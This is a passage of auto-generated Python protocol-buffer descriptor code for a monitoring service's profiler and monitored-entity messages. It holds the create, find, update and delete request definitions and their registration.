],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_ENABLEPROFILERREQUEST = _descriptor.Descriptor(
name='EnableProfilerRequest',
full_name='ai.verta.monitoring.EnableProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.EnableProfilerRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.EnableProfilerRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='environment', full_name='ai.verta.monitoring.EnableProfilerRequest.environment', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ENABLEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1635,
serialized_end=1825,
)
_DISABLEPROFILERREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DisableProfilerRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='ai.verta.monitoring.DisableProfilerRequest.Response.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1225,
serialized_end=1288,
)
_DISABLEPROFILERREQUEST = _descriptor.Descriptor(
name='DisableProfilerRequest',
full_name='ai.verta.monitoring.DisableProfilerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='profiler_id', full_name='ai.verta.monitoring.DisableProfilerRequest.profiler_id', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='monitored_entity_id', full_name='ai.verta.monitoring.DisableProfilerRequest.monitored_entity_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DISABLEPROFILERREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1828,
serialized_end=1967,
)
_MONITOREDENTITY_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.MonitoredEntity.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
_MONITOREDENTITY = _descriptor.Descriptor(
name='MonitoredEntity',
full_name='ai.verta.monitoring.MonitoredEntity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.MonitoredEntity.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.MonitoredEntity.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.MonitoredEntity.workspace_id', index=2,
number=5, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='created_at_timestamp_millis', full_name='ai.verta.monitoring.MonitoredEntity.created_at_timestamp_millis', index=3,
number=6, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='updated_at_timestamp_millis', full_name='ai.verta.monitoring.MonitoredEntity.updated_at_timestamp_millis', index=4,
number=7, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.MonitoredEntity.attributes', index=5,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='owner', full_name='ai.verta.monitoring.MonitoredEntity.owner', index=6,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.MonitoredEntity.resource_visibility', index=7,
number=10, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.MonitoredEntity.custom_permission', index=8,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version_number', full_name='ai.verta.monitoring.MonitoredEntity.version_number', index=9,
number=12, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_MONITOREDENTITY_ATTRIBUTESENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1970,
serialized_end=2414,
)
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
_CREATEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.Response.monitored_entity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2780,
serialized_end=2854,
)
_CREATEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='CreateMonitoredEntityRequest',
full_name='ai.verta.monitoring.CreateMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_id', index=1,
number=4, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_name', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_name', index=2,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.attributes', index=3,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.resource_visibility', index=4,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.custom_permission', index=5,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY, _CREATEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='workspace_identifier', full_name='ai.verta.monitoring.CreateMonitoredEntityRequest.workspace_identifier',
index=0, containing_type=None, fields=[]),
],
serialized_start=2417,
serialized_end=2890,
)
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY = _descriptor.Descriptor(
name='AttributesEntry',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2353,
serialized_end=2402,
)
_UPDATEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.Response.monitored_entity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2780,
serialized_end=2854,
)
_UPDATEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='UpdateMonitoredEntityRequest',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.attributes', index=2,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.resource_visibility', index=3,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.custom_permission', index=4,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY, _UPDATEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2893,
serialized_end=3298,
)
_FINDMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entities', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response.monitored_entities', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='total_records', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response.total_records', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3471,
serialized_end=3570,
)
_FINDMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='FindMonitoredEntityRequest',
full_name='ai.verta.monitoring.FindMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ids', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.ids', index=0,
number=1, type=4, cpp_type=4, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='names', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.names', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fuzzy_names', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.fuzzy_names', index=2,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_id', index=3,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_name', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_name', index=4,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='page_number', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.page_number', index=5,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='page_limit', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.page_limit', index=6,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_FINDMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='workspace_identifier', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_identifier',
index=0, containing_type=None, fields=[]),
],
serialized_start=3301,
serialized_end=3594,
)
_DELETEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=290,
)
_DELETEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='DeleteMonitoredEntityRequest',
full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DELETEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3596,
serialized_end=3650,
)
_CREATEPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_CREATEPROFILERREQUEST_RESPONSE.containing_type = _CREATEPROFILERREQUEST
_GETPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_GETPROFILERREQUEST_RESPONSE.containing_type = _GETPROFILERREQUEST
_UPDATEPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_UPDATEPROFILERREQUEST_RESPONSE.containing_type = _UPDATEPROFILERREQUEST
_LISTPROFILERSREQUEST_RESPONSE.fields_by_name['profilers'].message_type = _PROFILER
_LISTPROFILERSREQUEST_RESPONSE.containing_type = _LISTPROFILERSREQUEST
_DELETEPROFILERREQUEST_RESPONSE.containing_type = _DELETEPROFILERREQUEST
_BUILDSTATUSENUM_BUILDSTATUS.containing_type = _BUILDSTATUSENUM
_DEPLOYSTATUSENUM_DEPLOYSTATUS.containing_type = _DEPLOYSTATUSENUM
_PROFILERSTATUS.fields_by_name['build_status'].enum_type = _BUILDSTATUSENUM_BUILDSTATUS
_PROFILERSTATUS.fields_by_name['deploy_status'].enum_type = _DEPLOYSTATUSENUM_DEPLOYSTATUS
_GETPROFILERSTATUSREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_GETPROFILERSTATUSREQUEST_RESPONSE.containing_type = _GETPROFILERSTATUSREQUEST
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['statuses'].message_type = _PROFILERSTATUS
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE.containing_type = _FINDPROFILERSFORMONITOREDENTITYREQUEST
_KEYVALUE.fields_by_name['value'].message_type = google_dot_protobuf_dot_struct__pb2._VALUE
_KEYVALUE.fields_by_name['value_type'].enum_type = _VALUETYPEENUM_VALUETYPE
_VALUETYPEENUM_VALUETYPE.containing_type = _VALUETYPEENUM
_ENABLEPROFILERREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_ENABLEPROFILERREQUEST_RESPONSE.containing_type = _ENABLEPROFILERREQUEST
_ENABLEPROFILERREQUEST.fields_by_name['environment'].message_type = _KEYVALUE
_DISABLEPROFILERREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_DISABLEPROFILERREQUEST_RESPONSE.containing_type = _DISABLEPROFILERREQUEST
_MONITOREDENTITY_ATTRIBUTESENTRY.containing_type = _MONITOREDENTITY
_MONITOREDENTITY.fields_by_name['attributes'].message_type = _MONITOREDENTITY_ATTRIBUTESENTRY
_MONITOREDENTITY.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_MONITOREDENTITY.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY.containing_type = _CREATEMONITOREDENTITYREQUEST
_CREATEMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entity'].message_type = _MONITOREDENTITY
_CREATEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _CREATEMONITOREDENTITYREQUEST
_CREATEMONITOREDENTITYREQUEST.fields_by_name['attributes'].message_type = _CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY
_CREATEMONITOREDENTITYREQUEST.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_CREATEMONITOREDENTITYREQUEST.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_id'])
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_id'].containing_oneof = _CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_name'])
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_name'].containing_oneof = _CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY.containing_type = _UPDATEMONITOREDENTITYREQUEST
_UPDATEMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entity'].message_type = _MONITOREDENTITY
_UPDATEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _UPDATEMONITOREDENTITYREQUEST
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['attributes'].message_type = _UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_FINDMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entities'].message_type = _MONITOREDENTITY
_FINDMONITOREDENTITYREQUEST_RESPONSE.containing_type = _FINDMONITOREDENTITYREQUEST
_FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_id'])
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_id'].containing_oneof = _FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_name'])
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_name'].containing_oneof = _FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_DELETEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _DELETEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['Profiler'] = _PROFILER
DESCRIPTOR.message_types_by_name['CreateProfilerRequest'] = _CREATEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['GetProfilerRequest'] = _GETPROFILERREQUEST
DESCRIPTOR.message_types_by_name['UpdateProfilerRequest'] = _UPDATEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['ListProfilersRequest'] = _LISTPROFILERSREQUEST
DESCRIPTOR.message_types_by_name['DeleteProfilerRequest'] = _DELETEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['BuildStatusEnum'] = _BUILDSTATUSENUM
DESCRIPTOR.message_types_by_name['DeployStatusEnum'] = _DEPLOYSTATUSENUM
DESCRIPTOR.message_types_by_name['ProfilerStatus'] = _PROFILERSTATUS
DESCRIPTOR.message_types_by_name['GetProfilerStatusRequest'] = _GETPROFILERSTATUSREQUEST
DESCRIPTOR.message_types_by_name['FindProfilersForMonitoredEntityRequest'] = _FINDPROFILERSFORMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['ValueTypeEnum'] = _VALUETYPEENUM
DESCRIPTOR.message_types_by_name['EnableProfilerRequest'] = _ENABLEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['DisableProfilerRequest'] = _DISABLEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['MonitoredEntity'] = _MONITOREDENTITY
DESCRIPTOR.message_types_by_name['CreateMonitoredEntityRequest'] = _CREATEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['UpdateMonitoredEntityRequest'] = _UPDATEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['FindMonitoredEntityRequest'] = _FINDMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['DeleteMonitoredEntityRequest'] = _DELETEMONITOREDENTITYREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Profiler = _reflection.GeneratedProtocolMessageType('Profiler', (_message.Message,), {
'DESCRIPTOR' : _PROFILER,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.Profiler)
})
_sym_db.RegisterMessage(Profiler)
CreateProfilerRequest = _reflection.GeneratedProtocolMessageType('CreateProfilerRequest', (_message.Message,), {
